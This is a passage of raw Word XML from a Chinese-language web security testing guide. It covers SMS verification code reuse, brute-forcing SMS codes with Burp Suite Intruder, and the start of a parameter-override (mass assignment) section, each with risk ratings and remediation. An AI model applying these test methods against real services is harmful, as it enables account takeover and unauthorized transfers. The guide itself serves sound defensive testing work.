          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E5F2C9" w14:textId="392B2C15" w:rsidR="00E43ED4" w:rsidRPr="00067578" w:rsidRDefault="00E43ED4" w:rsidP="00067578">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同一个短信验证码是否能使用多次；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE90E4D" w14:textId="5745CEF0" w:rsidR="0094664F" w:rsidRPr="00067578" w:rsidRDefault="00C24790" w:rsidP="00067578">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="0094664F" w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00974138" w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改／重置密码、交易操作等功能通常需要短信验证码，若验证码可绕过，攻击者可利用该漏洞</w:t>
      </w:r>
      <w:r w:rsidR="00A778F3" w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行</w:t>
      </w:r>
      <w:r w:rsidR="00BC7DAF" w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重置他人密码或转账等危险操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD6A14C" w14:textId="77777777"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风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF6CE3B" w14:textId="13FBFEE6" w:rsidR="0094664F" w:rsidRPr="00067578" w:rsidRDefault="00A9443F" w:rsidP="00067578">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>中危</w:t>
      </w:r>
      <w:r w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：验证码可多次使用或发现特权验证码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70527D61" w14:textId="77777777"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lastRenderedPageBreak/>
        <w:t>修复方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB2B0EC" w14:textId="439C918F" w:rsidR="001A48CB" w:rsidRPr="00067578" w:rsidRDefault="001A48CB" w:rsidP="00067578">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>若存在特权验证码，建议将其删除；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E58E6D6" w14:textId="7BDCAFE5" w:rsidR="001A48CB" w:rsidRPr="00067578" w:rsidRDefault="001A48CB" w:rsidP="00067578">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用服务端应严格校验验证码参数是否为空，格式是否正确；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A0EB2D" w14:textId="5C224776" w:rsidR="0094664F" w:rsidRDefault="00CB795E" w:rsidP="00067578">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关键操作每提交一次请求，应发送新的短信验证码，并且不可继续使用旧的验证码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13115299" w14:textId="4FABE81C" w:rsidR="008446BE" w:rsidRPr="00067578" w:rsidRDefault="008446BE" w:rsidP="008446BE">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39CB2CA" w14:textId="2314FF3E" w:rsidR="0094664F" w:rsidRPr="00F757E4" w:rsidRDefault="0094664F" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="_Toc498434529"/>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>短信验证码可暴力破解</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:p w14:paraId="061B86BE" w14:textId="5642A0CD" w:rsidR="0094664F" w:rsidRPr="00BB4A47" w:rsidRDefault="0094664F" w:rsidP="00BB4A47">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4A47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="004E47F8" w:rsidRPr="00BB4A47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>短信验证码位数太短或有效期太长导致可暴力破解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C583B7C" w14:textId="4DDC4898" w:rsidR="0094664F" w:rsidRPr="00BB4A47" w:rsidRDefault="0094664F" w:rsidP="00BB4A47">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4A47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>测试方法：</w:t>
      </w:r>
      <w:r w:rsidR="004C5D24" w:rsidRPr="00BB4A47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点击发送短信验证码，输入任意验证码，提交请求，使用</w:t>
      </w:r>
      <w:r w:rsidR="004C5D24" w:rsidRPr="00BB4A47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>burpsuite</w:t>
      </w:r>
      <w:r w:rsidR="004C5D24" w:rsidRPr="00BB4A47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拦截请求，在</w:t>
      </w:r>
      <w:r w:rsidR="004C5D24" w:rsidRPr="00BB4A47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>intruder</w:t>
      </w:r>
      <w:r w:rsidR="004C5D24" w:rsidRPr="00BB4A47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模块设置验证码参数为枚举变量，这是</w:t>
      </w:r>
      <w:r w:rsidR="004C5D24" w:rsidRPr="00BB4A47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r w:rsidR="004C5D24" w:rsidRPr="00BB4A47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型为</w:t>
      </w:r>
      <w:r w:rsidR="004C5D24" w:rsidRPr="00BB4A47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>numbers</w:t>
      </w:r>
      <w:r w:rsidR="004C5D24" w:rsidRPr="00BB4A47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，对验证码进行暴力破解。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182AF181" w14:textId="13E17BCB" w:rsidR="0094664F" w:rsidRPr="00BB4A47" w:rsidRDefault="00C24790" w:rsidP="00BB4A47">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4A47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="0094664F" w:rsidRPr="00BB4A47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="006B0131" w:rsidRPr="00BB4A47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改／重置密码、交易操作等功能通常需要短信验证码，若验证码可暴力破解，攻击者可利用该漏洞进行重置他人密码或转账等危险操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427F9EA1" w14:textId="77777777" w:rsidR="0094664F" w:rsidRPr="00BB4A47" w:rsidRDefault="0094664F" w:rsidP="00BB4A47">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4A47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F56C3E" w14:textId="156E06B6" w:rsidR="0094664F" w:rsidRPr="00BB4A47" w:rsidRDefault="007042C0" w:rsidP="00BB4A47">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4A47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4A47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>中危</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4A47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4A47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：手机短信验证码小于</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4A47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 6 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4A47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位、有效期大于</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4A47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4A47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分钟、验证错误次数无限制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464653A0" w14:textId="77777777" w:rsidR="0094664F" w:rsidRPr="00BB4A47" w:rsidRDefault="0094664F" w:rsidP="00BB4A47">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4A47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C34C83" w14:textId="5B8E6C57" w:rsidR="0072196E" w:rsidRPr="00BB4A47" w:rsidRDefault="0072196E" w:rsidP="00BB4A47">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4A47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>短信验证码不少于</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4A47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4A47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFF8BE4" w14:textId="7CA456F2" w:rsidR="0072196E" w:rsidRPr="00BB4A47" w:rsidRDefault="0072196E" w:rsidP="00BB4A47">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4A47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有效期不超过</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4A47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4A47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分钟；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1302F772" w14:textId="3D9F6AF2" w:rsidR="0094664F" w:rsidRDefault="0072196E" w:rsidP="00BB4A47">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4A47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验证码错误次数超过上限应采取</w:t>
      </w:r>
      <w:r w:rsidR="00C231B0" w:rsidRPr="00BB4A47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账户</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4A47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>锁定策略。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F45A4F" w14:textId="3C40C525" w:rsidR="008446BE" w:rsidRPr="00BB4A47" w:rsidRDefault="008446BE" w:rsidP="008446BE">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FBC489C" w14:textId="68418D28" w:rsidR="0094664F" w:rsidRPr="00F757E4" w:rsidRDefault="0094664F" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="_Toc498434530"/>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>参数覆盖</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
    </w:p>
    <w:p w14:paraId="7A414003" w14:textId="41D26542" w:rsidR="0094664F" w:rsidRPr="00C15061" w:rsidRDefault="0094664F" w:rsidP="00C15061">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00175DD0" w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数覆盖，也叫对象自动绑定漏洞。许多框架均支持对象自动绑定，比如</w:t>
      </w:r>
      <w:r w:rsidR="00175DD0" w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Spring MCV, </w:t>
      </w:r>
      <w:r w:rsidR="00175DD0" w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>它允许将</w:t>
      </w:r>
      <w:r w:rsidR="00175DD0" w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00175DD0" w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求参数自动的绑定到对象，攻击者可以添加额外的</w:t>
      </w:r>
      <w:r w:rsidR="00175DD0" w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00175DD0" w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求参数，如果开发人员在处理业务逻辑时缺少安全校验就会导致参数覆盖问题。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550712C2" w14:textId="47EA8F2B" w:rsidR="0094664F" w:rsidRPr="00C15061" w:rsidRDefault="0094664F" w:rsidP="00C15061">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>测试方法：</w:t>
      </w:r>
      <w:r w:rsidR="00467E3E" w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下面举一个具体的攻击场景：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A4CDDB" w14:textId="77777777" w:rsidR="00D36176" w:rsidRPr="00C15061" w:rsidRDefault="00052505" w:rsidP="00C15061">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>这是国内某</w:t>
      </w:r>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>p2p</w:t>
      </w:r>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>平台账户余额功能</w:t>
      </w:r>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2488D856" w14:textId="77777777" w:rsidR="00D36176" w:rsidRPr="00C15061" w:rsidRDefault="00052505" w:rsidP="000B549D">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLineChars="95"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="330541A6" wp14:editId="141F2F92">
            <wp:extent cx="5395595" cy="1203960"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="112" name="图片 11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1203960"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D0E14E" w14:textId="77777777" w:rsidR="00D36176" w:rsidRPr="00C15061" w:rsidRDefault="00D36176" w:rsidP="00C15061">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
